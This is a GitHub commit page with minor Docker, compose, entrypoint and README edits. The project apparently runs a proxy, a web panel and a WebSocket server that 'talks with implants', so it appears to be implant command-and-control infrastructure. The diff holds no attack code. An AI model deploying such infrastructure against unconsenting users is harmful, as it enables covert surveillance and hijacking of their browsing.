Skip to content

Commit 90b58f1

Browse files
author
Matthew Bryant (mandatory)
committed
update
1 parent c06a533 commit 90b58f1

File tree

4 files changed

+5
-6
lines changed

4 files changed

+5
-6
lines changed

Dockerfile

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -26,8 +26,8 @@ COPY server.js /work/
2626
COPY database.js /work/
2727
COPY docker-entrypoint.sh /work/
2828

29-
RUN npm install -g nodemon
29+
# For debugging/hot-reloading
30+
#RUN npm install -g nodemon
3031

3132
ENTRYPOINT ["/work/docker-entrypoint.sh"]
3233
#ENTRYPOINT ["node", "/work/server.js"]
33-
#ENTRYPOINT ["tail", "-f", "/dev/null"]

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ This is also especially useful for locked down orgs that make use of [Chrome OS]
3737
* [`docker`](https://docs.docker.com/get-docker/) and [`docker-compose`](https://docs.docker.com/compose/install/)
3838
* Chrome web browser
3939

40-
# Installation & Setup
40+
# Installation & Setup (~5-10 Minutes)
4141

4242
## Setting Up the Backend
4343

docker-compose.yaml

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,6 @@ services:
1414
build: .
1515
volumes:
1616
- ./ssl:/work/cassl
17-
- ./api-server.js:/work/api-server.js
1817
depends_on:
1918
- db
2019
- redis
@@ -30,4 +29,4 @@ services:
3029
ports:
3130
- "127.0.0.1:8080:8080" # Proxy server
3231
- "127.0.0.1:4343:4343" # WebSocket server (talks with implants)
33-
- "127.0.0.1:8118:8118" # Web panel
32+
- "127.0.0.1:8118:8118" # Web panel

docker-entrypoint.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,3 @@
11
#!/bin/bash
22
cp /work/ssl/* /work/cassl/
3-
nodemon node /work/server.js
3+
node /work/server.js

0 commit comments

Comments
 (0)